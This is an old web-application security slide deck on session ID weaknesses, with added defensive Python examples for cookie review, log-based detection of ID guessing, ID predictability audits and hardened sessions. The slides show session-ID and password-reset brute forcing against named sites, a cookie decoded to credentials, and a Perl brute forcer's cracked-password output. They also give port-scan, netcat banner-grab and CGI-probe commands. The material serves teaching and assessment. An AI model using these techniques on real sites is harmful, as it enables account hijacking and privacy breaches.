6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480).
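Added example (not from the deck): a parser for the seven-field cookies.txt format described above, with a review pass that flags session tokens sent without the secure flag or kept on disk long after the session. The www.redhat.com line is the slide's own; the other two lines, the SESSION_NAMES list and the review thresholds are constructed assumptions.

```python
import time
from dataclasses import dataclass

# Constructed cookies.txt sample in the Netscape format the slide walks through;
# the www.redhat.com line is the slide's own example, the other two are invented.
COOKIES_TXT = """# Netscape HTTP Cookie File (constructed sample)
www.redhat.com\tFALSE\t/\tFALSE\t1154029490\tApache\t64.3.40.151.16018996349247480
.yahoo.com\tTRUE\t/\tFALSE\t1154029490\tPU\tt=1
bank.example\tFALSE\t/\tTRUE\t0\tJSESSIONID\tA1B2C3D4E5F6
"""

# Names treated as session tokens by the review (assumption; the slide calls
# the redhat cookie "Apache" the Session ID variable).
SESSION_NAMES = {"apache", "jsessionid", "phpsessid", "session-id", "sessionid"}


@dataclass
class Cookie:
    domain: str      # 1) website that created and can read the cookie
    all_hosts: bool  # 2) flag: TRUE = every machine in the domain may read it
    path: str        # 3) URL paths that can access the cookie
    secure: bool     # 4) TRUE = only sent over SSL
    expires: int     # 5) Unix time; 0 = kept in memory only (session cookie)
    name: str        # 6) variable name
    value: str       # 7) variable value


def parse_cookies_txt(text):
    """Parse the seven tab-separated fields of each cookies.txt line."""
    cookies = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        domain, flag, path, secure, expires, name, value = fields
        cookies.append(Cookie(domain, flag == "TRUE", path, secure == "TRUE",
                              int(expires), name, value))
    return cookies


def expires_utc(cookie):
    """Field 5 as a calendar date, or 'session' for in-memory cookies."""
    if cookie.expires == 0:
        return "session"
    return time.strftime("%Y-%m-%d", time.gmtime(cookie.expires))


def review(cookies, now):
    """Findings a defender cares about: a session token that is not marked
    secure also travels over cleartext HTTP, and one with a far-off expiry
    sits on disk long after the user has gone."""
    findings = []
    for c in cookies:
        if c.name.lower() not in SESSION_NAMES:
            continue
        if not c.secure:
            findings.append((c.name, "session token not flagged secure"))
        if c.expires and c.expires - now > 86400:
            days = (c.expires - now) // 86400
            findings.append((c.name, "session token persists for %d more days" % days))
    return findings
```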
Cookie Stored Session ID Examples
domain | flag | path | secure | expiration | name | value
.starwars.com | TRUE | / | FALSE | | WookieCookie | 13fe8fff4799f27dcf19c959dafa8437
.www.ibm.com | TRUE | /rc | FALSE | | sauidp | p0010000000006DCC102552982300005
.ebay.com | TRUE | / | FALSE | | lucky8 | 91992.003F75FEF2
.amazon.com | FALSE | / | FALSE | | session-id | 103-1456769-7895034
.yahoo.com | TRUE | / | FALSE | 1271361612 | B | 3qpaarsu48dai&b=2
.yahoo.com | TRUE | / | FALSE | 1154029490 | I | ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com | TRUE | / | FALSE | 1154029490 | PU | t=1
(Expiration values the slide lists for the first four rows, in order: 1341753778, 1293768100, 1183296824, 1026115299; a further value, 694036, could not be placed in the extracted slide.)
URL Stored Session ID
• http://www.123greetings.com/view/7AD30725122120803
• http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
• http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS
• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/1024524380-3923344
Session IDs in HTML Hidden Fields
<FORM METHOD=POST ACTION="/cgibin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value="67312745">
<input type="submit" name="Access My Bank Information">
</form>
Session ID Security Overview
Session ID security is a microcosm of Web Application Security.
Web Application Security cuts through many different aspects of an organization’s information security infrastructure.
An Example: Brute Forcing Session ID’s in URLS
Dear Terry Gillette,
An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch.
To see your greeting card, choose from any of the following options which works best for you.
------- Method 1 -------
Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
An Example: Brute Forcing Session ID’s in URLS
http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
Once we associate the date on which we sent these electronic cards, July 25 at 12:21 PST, with the digits 07251221, we can eliminate that much more entropy from this session ID. Notice that we’re then left with five incrementing “random” digits at the end of the URL.
An Example: Brute Forcing Session IDs in URLs: AUTOMATED DEMO!
Why Brute Forcing Web Session IDs is Bad
• Can result in an online user's web application account being hijacked or loss of privacy
• Easy to exploit
• Unlike a typical login scenario, there is no failed-login lockout
• Prevalent disclosure among security mailing lists
• Typical security solutions (firewalls, IDS, etc.) do nothing to detect these attacks
• Log data is usually not that detailed
• IDS is not well developed for Web Application attacks
• SSL (server side) does nothing to protect against these attacks
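The points above are that firewalls and IDS see only ordinary GETs and that log data is thin. What the access log does still show is one client requesting many distinct session IDs on an ID-bearing URL inside a short window, most of them failing. The script below is an added example, not code from the deck: it parses Apache combined-format lines and raises one alert per source whose busiest window holds at least five distinct IDs. The two URL layouts in ID_PATTERNS are modelled on the 123greetings and dfilm URLs on these slides, the 60-second window and threshold of 5 are assumptions, and SAMPLE_LOG is constructed.

```python
"""Spotting session-ID guessing in web server access logs (added example,
not part of the deck). Assumptions: Apache combined log format, the URL
layouts in ID_PATTERNS, a 60 s window and 5 distinct IDs as the threshold.
SAMPLE_LOG is constructed for the demonstration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Where this (assumed) site carries a session ID in the request URL.
ID_PATTERNS = [re.compile(r"^/view/([A-Za-z0-9]+)"), re.compile(r"[?&]id=(\d+)")]


def parse_line(line):
    """One log line -> dict with ip, ts, path, status and the session ID found
    in the URL (None when the URL carries none); None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    sid = None
    for pattern in ID_PATTERNS:
        hit = pattern.search(m.group("path"))
        if hit:
            sid = hit.group(1)
            break
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "sid": sid,
    }


def find_guessers(lines, window_seconds=60, min_ids=5):
    """One alert per source IP whose busiest sliding window holds at least
    min_ids distinct session IDs; the alert reports that window."""
    window = timedelta(seconds=window_seconds)
    by_ip = defaultdict(list)
    for line in lines:
        event = parse_line(line)
        if event and event["sid"]:
            by_ip[event["ip"]].append(event)
    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(events)):
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            span = events[start:end + 1]
            ids = {e["sid"] for e in span}
            if len(ids) >= min_ids and (best is None or len(ids) > best["distinct_ids"]):
                best = {
                    "ip": ip,
                    "distinct_ids": len(ids),
                    "requests": len(span),
                    "errors": sum(1 for e in span if e["status"] >= 400),
                    "first": span[0]["ts"],
                    "last": span[-1]["ts"],
                }
        if best:
            alerts.append(best)
    return alerts


# Constructed log: one genuine recipient viewing a card, one client walking IDs.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jul/2002:12:30:01 -0700] "GET /view/AD30725122116211 HTTP/1.1" 200 5120 "-" "Mozilla/4.75 [en]"',
    '203.0.113.7 - - [25/Jul/2002:12:30:02 -0700] "GET /images/card.gif HTTP/1.1" 200 812 "-" "Mozilla/4.75 [en]"',
] + [
    f'198.51.100.9 - - [25/Jul/2002:12:41:{sec:02d} -0700] "GET /view/AD307251221{n} HTTP/1.0" '
    f'{200 if n == 16218 else 404} 290 "-" "lwp-request/2.0"'
    for sec, n in enumerate(range(16212, 16221))
] + [
    '203.0.113.7 - - [25/Jul/2002:12:45:30 -0700] "GET /view/AD30725122116211 HTTP/1.1" 200 5120 "-" "Mozilla/4.75 [en]"',
]

if __name__ == "__main__":
    for a in find_guessers(SAMPLE_LOG):
        print(f"{a['ip']}: {a['distinct_ids']} session IDs in {a['requests']} requests, "
              f"{a['errors']} errors, {a['first']:%H:%M:%S}-{a['last']:%H:%M:%S}")
```

The legitimate recipient requests one ID twice and never trips the rule; the walker is reported with nine distinct IDs and eight errors in nine seconds. A real deployment would feed the alert to whatever the IDS lacks: a per-source block or at least a ticket, since the web server itself never complained.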
In the News
– "Privacy hole found in Verizon Wireless Web site", Computerworld, Sept 6, 2001.
http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
http://online.securityfocus.com/archive/1/211520
– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager.
To change or re-enter your password, please copy and paste the URL below
into the "Location" or "Address" field of your web browser and hit the
'Enter' key on your keyboard.
Note: If your e-mail program supports HTML, you may be able to click on
the link below.
http://mydomain.register.com/change_password.cgi?155218782787
Note: Above link will expire within three days
Example 2: Brute Forcing Web Session IDs
http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969
URL Example – Brute Forcing Dfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
To: [email protected]
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at
http://www.dfilm.com
URL Example – Brute Forcing Dfilm.com
No privacy for other users' creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
URL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
URL Example – Sendomatic.com
View other people's events. Crash a party, edit an event, cancel an event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336
http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
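The pattern that the 123greetings, dfilm and Sendomatic identifiers above share (a static prefix, an embedded timestamp, a small counter-like suffix) can be checked mechanically before an ID scheme goes live, which is what a session auditor does. The script below is an added example written for this page, not code from the deck or from the Sessions Auditor tool it lists. GREETINGS_IDS, DFILM_IDS and SENDOMATIC_IDS are copied from the URLs on these slides; RANDOM_IDS is a constructed control set; the MMDDHHMM timestamp layout, the 5% mean-step rule for "counter-like" and the 64-bit key-space floor are this example's own assumptions.

```python
"""Predictability audit of session identifiers (added example; not the
Sessions Auditor tool or any other code from the deck).

Reports a shared prefix, a timestamp hidden in it, the width and key space
of the part that actually varies, and whether that part behaves like a counter."""
import math
import re
import secrets
from datetime import datetime

# IDs from the 123greetings URLs on the slides, in the order they were issued.
GREETINGS_IDS = [
    "AD30725122116211", "AD30725122118909", "AD30725122120803",
    "AD30725122122507", "AD30725122124100",
]
# IDs from the dfilm URLs on the slides (listed newest first there).
DFILM_IDS = ["110532", "110531", "110530", "110529", "110528", "110527", "110526"]
# IDs from the Sendomatic URLs on the slides.
SENDOMATIC_IDS = ["76330", "76331", "76332", "76333", "76334", "76335", "76336"]
# Constructed control set: what 128-bit random hex tokens look like.
RANDOM_IDS = [
    "c1f6e2a9b3d04f7e8a5c6b9d2e1f0a3b", "7a0b9c8d3e2f1a6b5c4d7e8f9a0b1c2d",
    "e9d8c7b6a5f4e3d2c1b0a9f8e7d6c5b4", "0f1e2d3c4b5a69788796a5b4c3d2e1f0",
    "5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d",
]


def common_prefix(ids):
    """Longest prefix shared by every ID; static characters carry no entropy."""
    if not ids:
        return ""
    lo, hi = min(ids), max(ids)
    n = 0
    while n < min(len(lo), len(hi)) and lo[n] == hi[n]:
        n += 1
    return lo[:n]


def find_timestamp(s, year=2002):
    """First 8-digit run in s that parses as MMDDHHMM (the 07251221 the text
    points out), or None. Assumption: zero-padded month/day/hour/minute."""
    for m in re.finditer(r"(?=(\d{8}))", s):
        d = m.group(1)
        try:
            datetime(year, int(d[:2]), int(d[2:4]), int(d[4:6]), int(d[6:8]))
            return d
        except ValueError:
            continue
    return None


def charset_size(s):
    """Size of the smallest standard alphabet that covers s."""
    if s.isdigit():
        return 10
    if re.fullmatch(r"[0-9a-f]+", s):
        return 16
    if re.fullmatch(r"[0-9a-z]+", s):
        return 36
    if s.isalnum():
        return 62
    return 64


def audit(ids):
    """Describe how guessable the varying part of a set of IDs is."""
    prefix = common_prefix(ids)
    all_numeric = all(i.isdigit() for i in ids)
    # A purely numeric ID is one counter even if its leading digits agree;
    # otherwise only the part after the shared prefix varies.
    variable = list(ids) if all_numeric else [i[len(prefix):] for i in ids]
    width = max(len(v) for v in variable)
    joined = "".join(variable)
    bits = width * math.log2(charset_size(joined)) if joined else 0.0
    report = {"prefix": prefix, "timestamp": find_timestamp(prefix),
              "width": width, "bits": round(bits, 1), "findings": []}
    if report["timestamp"]:
        report["findings"].append("timestamp in prefix")
    if joined.isdigit():
        vals = [int(v) for v in variable]
        steps = [b - a for a, b in zip(vals, vals[1:])]
        monotonic = bool(steps) and (all(s > 0 for s in steps) or all(s < 0 for s in steps))
        report["mean_step"] = sum(abs(s) for s in steps) / len(steps) if steps else 0.0
        # Values issued in order and moving a tiny fraction of the space per step.
        if monotonic and report["mean_step"] < 0.05 * 10 ** width:
            report["findings"].append("counter-like values")
    if bits < 64:
        report["findings"].append("key space below 64 bits")
    report["predictable"] = bool(report["findings"])
    return report


if __name__ == "__main__":
    samples = [("123greetings", GREETINGS_IDS), ("dfilm", DFILM_IDS),
               ("sendomatic", SENDOMATIC_IDS), ("constructed random", RANDOM_IDS),
               ("secrets.token_hex(16)", [secrets.token_hex(16) for _ in range(5)])]
    for name, sample in samples:
        print(name, audit(sample))
```

Run against the slide's five 123greetings IDs the audit reports the 07251221 timestamp, a 5-digit numeric suffix (about 16.6 bits) and a mean step of 1972, all three findings; the random control set and fresh secrets.token_hex() output report nothing.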
Cookie Example – Freeservers.com
• LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
• Base64 decode the string (e.g. with http://www.securitystats.com/tools/base64.asp):
testing123.itgo.com:1231234
username:password
• Next, automate it with a Perl exploit by feeding encoded strings into the cookie
Cookie Example – Freeservers.com
%perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is
1231234
GET http://testing123.itgo.com/cgibin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%
Cookie Example – Freeservers.com
• Or a much longer way: use the brute forcer on
every single cookie character combination
Cookie/URL Example – Amazon.com
• Some sites use the URL AND Cookie for
authentication:
6 Common Problems
• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.
• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string's key space is not sufficiently large.
6 Common Problems – Continued
• Indefinite Expiration on Server – Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.
• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network, taking the guess-work away for a miscreant. This is still a problem with proxy servers.
• Insecure Retrieval – By tricking the user's browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user's sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
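The six problems above, and the hidden-field bank form earlier, all have the same remedy on the server. The code below is an added example of that remedy, not code from the deck: IDs come from the OS random source with a 256-bit key space (no linear algorithm, no timestamp), the server enforces an idle timeout and an absolute lifetime, the account is bound to the session record rather than read back from a hidden field, the ID is rotated after login, and the cookie is issued with Secure, HttpOnly and SameSite so it is neither sent in the clear nor readable by injected script. The timeouts, the cookie name sessionID and the ManualClock helper are assumptions of this example.

```python
"""Server-side session handling that addresses the six problems above
(added example; not code from the deck). Assumptions: 256-bit random IDs,
a 15-minute idle timeout and 8-hour lifetime enforced on the server, the
account bound to the session on the server, and cookie attributes that keep
the ID off clear-text connections and away from page script."""
import secrets
import time
from dataclasses import dataclass

ID_BYTES = 32          # 256 bits: a key space no online guessing campaign can cover
IDLE_TIMEOUT = 900     # seconds without a request before the session dies
MAX_LIFETIME = 8 * 3600


@dataclass
class Session:
    account: str
    created: float
    last_seen: float


class ManualClock:
    """Injectable clock so expiry can be exercised without sleeping."""
    def __init__(self, now=1_000_000.0):
        self.now = now

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class SessionStore:
    def __init__(self, clock=time.time, idle_timeout=IDLE_TIMEOUT, max_lifetime=MAX_LIFETIME):
        self._sessions = {}
        self.clock = clock
        self.idle_timeout = idle_timeout
        self.max_lifetime = max_lifetime

    def create(self, account):
        """New session: unpredictable ID, account recorded server-side only."""
        sid = secrets.token_urlsafe(ID_BYTES)
        now = self.clock()
        self._sessions[sid] = Session(account, now, now)
        return sid

    def lookup(self, sid):
        """Account bound to sid, or None; expired sessions are dropped on sight."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s.last_seen > self.idle_timeout or now - s.created > self.max_lifetime:
            del self._sessions[sid]
            return None
        s.last_seen = now
        return s.account

    def destroy(self, sid):
        self._sessions.pop(sid, None)

    def rotate(self, sid):
        """Fresh ID for the same account (after login or a privilege change),
        so an ID captured or guessed earlier stops working."""
        account = self.lookup(sid)
        if account is None:
            return None
        self.destroy(sid)
        return self.create(account)


def set_cookie_header(sid, max_age=IDLE_TIMEOUT):
    """Secure: never sent over plain HTTP. HttpOnly: not readable by script.
    SameSite: not attached to cross-site requests. Short Max-Age, no far-future Expires."""
    return (f"Set-Cookie: sessionID={sid}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Lax")


def handle_account_request(store, sid, requested_account):
    """What the bank form should do: the account comes from the session record,
    and a client-supplied account that disagrees is refused."""
    account = store.lookup(sid)
    if account is None:
        return 401, "no valid session"
    if requested_account != account:
        return 403, "account is not bound to this session"
    return 200, f"account information for {account}"


if __name__ == "__main__":
    clock = ManualClock()
    store = SessionStore(clock=clock)
    sid = store.create("67312745")
    print(set_cookie_header(sid))
    print(handle_account_request(store, sid, "67312745"))
    print(handle_account_request(store, sid, "00000000"))
    clock.advance(IDLE_TIMEOUT + 1)
    print(handle_account_request(store, sid, "67312745"))  # idle timeout has passed
```

The hidden "useraccount" field from the bank form becomes redundant: the server already knows which account the session belongs to, so a tampered value is refused with 403 and a guessed or expired ID with 401. Rotation on login closes the window in which an ID issued before authentication could be reused.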
Tools
• Sessions Auditor - www.idefense.com/idtools/Session_Auditor.zip
• Visual Testing – WebSleuth - www.geocities.com/dzzie/sleuth
• WebProxy - www.atstake.com/research/tools/index.html
• HTTPush - httpush.sourceforge.net
• Achilles - www.digizen-security.com/downloads.html
• MiniBrowser - aignes.com/download.htm
Why Automated Tools Don’t
Work Very Well
• Some good things:
– Completeness
– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands
of anyone who calls themselves a
“Information Security Expert”.
Why Automated Tools Don't Work Very Well
• Every programmer does things a little differently
• Authentication schemes are hard to automate
• Error codes are not standardized
• Sometimes simple things like SSL get in the way
Why People are Better
• Recognition of subtle errors
• We understand the impact and therefore the risk of a vulnerability
• We are grounded in the fundamentals of Computer Science and therefore are able to find "real" bugs, flaws in logic
Web Hacking Accessories
• Some helpful tools include….
– A port scanner (Nmap et al.) www.insecure.org/nmap/
– Netcat; the network swiss army knife
http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner; Whisker
http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– OpenSSL source and documentation
• OpenSSL, RFC 2246
New tools on the horizon…
• Nikto
– CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs, and old versions. Database frequently updated. http://www.cirt.net/
• WHArsenal
– Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests, while controlling/modifying request particulars. http://community.whitehatsec.com/
• @stake WebProxy
– Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/
• Nessus
– Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. http://www.nessus.org/
Basic Training for Web Combat…
• Port scanning
– Look for well-known TCP web ports.
• 80, 81, 443, 8000, 8080, etc…
• Using FScan (from Foundstone)
fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor)
nmap -p 80,81,443,8000,8080 10.0.0.1
Basic Training for Web Combat…
• Fingerprinting
– HTTP Banner grabbing.
– netcat as a TCP client (even telnet works)
nc 10.0.0.1 80
HEAD / HTTP/1.0
• Advanced HTTP methods:
– TRACE, OPTIONS, etc.
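The two previous slides (port scan, then banner grab with HEAD and the other methods) are one inventory procedure that an administrator runs against their own hosts just as an assessor does. The script below is an added example of that procedure in Python, not the fscan/nmap/netcat commands above or any code from the deck: scan_web_ports() is a TCP connect scan of the ports the slide lists, http_request() sends the same HEAD / HTTP/1.0 that the netcat example types by hand, parse_response() separates the status line from the headers, and trace_enabled() reads the Allow header of an OPTIONS reply so the TRACE method can be confirmed off. SAMPLE_HEAD and SAMPLE_OPTIONS are constructed replies with invented version strings, not captures from a real host.

```python
"""Web port inventory and HTTP fingerprinting (added example; not code from
the deck). Plain HTTP only: port 443 needs a TLS-wrapped socket. The sample
replies at the bottom are constructed for the demonstration."""
import socket

WEB_PORTS = (80, 81, 443, 8000, 8080)


def scan_web_ports(host, ports=WEB_PORTS, timeout=1.0):
    """Ports on host that accept a TCP connection (connect scan)."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass
    return open_ports


def parse_response(raw):
    """(status line, {lower-cased header name: value}) from a raw HTTP reply."""
    head = raw.decode("iso-8859-1").split("\r\n\r\n", 1)[0]
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return (lines[0] if lines else ""), headers


def http_request(host, port, method="HEAD", path="/", timeout=3.0):
    """Send one HTTP/1.0 request (the server closes when done) and parse the reply."""
    request = f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


def fingerprint(status, headers):
    """The fields a banner grab is after."""
    return {"status": status,
            "server": headers.get("server"),
            "powered_by": headers.get("x-powered-by")}


def trace_enabled(headers):
    """True when an OPTIONS reply advertises TRACE, which should be disabled."""
    methods = [m.strip().upper() for m in headers.get("allow", "").split(",")]
    return "TRACE" in methods


# Constructed sample replies (version strings invented for illustration).
SAMPLE_HEAD = (b"HTTP/1.1 200 OK\r\n"
               b"Server: Apache/1.3.26 (Unix) mod_ssl/2.8.10\r\n"
               b"X-Powered-By: PHP/4.2.2\r\n"
               b"Connection: close\r\n"
               b"Content-Type: text/html\r\n\r\n")
SAMPLE_OPTIONS = (b"HTTP/1.1 200 OK\r\n"
                  b"Server: Apache/1.3.26 (Unix)\r\n"
                  b"Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
                  b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.1"
    for port in scan_web_ports(host):
        status, headers = http_request(host, port)
        print(port, fingerprint(status, headers))
        _, options = http_request(host, port, method="OPTIONS")
        print(port, "TRACE enabled" if trace_enabled(options) else "TRACE disabled")
```

Run over an inventory list this gives a table of Server and X-Powered-By strings to compare against the patch baseline, plus a flag for every host still answering OPTIONS with TRACE in Allow.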
Basic Training for Web Combat…
Shaking the tree for the low hanging fruit….
• Scan using a database of known web vulnerabilities.
• Whisker (by Rain Forest Puppy)
./whisker.pl -h 10.0.0.1 -I 1
• cgichk.c
<snip>
"GET /cgi-bin/phf HTTP/1.0\n\n";
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
"GET /cgi-bin/test-cgi HTTP/1.0\n\n";
"GET /cgi-bin/php.cgi HTTP/1.0\n\n";
• ISS, Cybercop, Retina, etc.
el33t hax0r Training for Web
Combat…
What about SSL?
• Some SSL Myths:
– “We are secure because we use SSL!”
– “Strong 128 bit crypto being used”
– “We use Digital Certificates signed by VeriSign”
Proxy Over SSL
• Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
Web client -> nc -> openssl -> SSL web server
Assessment Tools
• Vulnerability scanners
– Look for a known list of vulnerable applications or
technologies
– Do not (can not) engage/scan custom applications
and configurations
– General vulnerability scanners: ISS, Cybercop,
Nessus
– Web-specific vulnerability scanners:
WebInspect, whisker
Assessment tools
• ‘Proxy monitors’
– HTTP proxy which monitors traffic, looking for
web vulnerabilities as they pass
– Can analyze custom applications with the help of a
user
– Examples: AppScan, RFProxy,
HTTPush, Achilles
Root Causes of Web Hacks
• Complex web architectures may cause
oversight in web server configuration.
• URL Parsing.
• File Canonicalization.
• Combination of underlying operating system
and web server may leave holes.
Root Causes of Web Hacks
• Untested code used in web applications, to
save time.
• Level of security consciousness low in web
application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero knowledge administration breeds zero
knowledge administrators.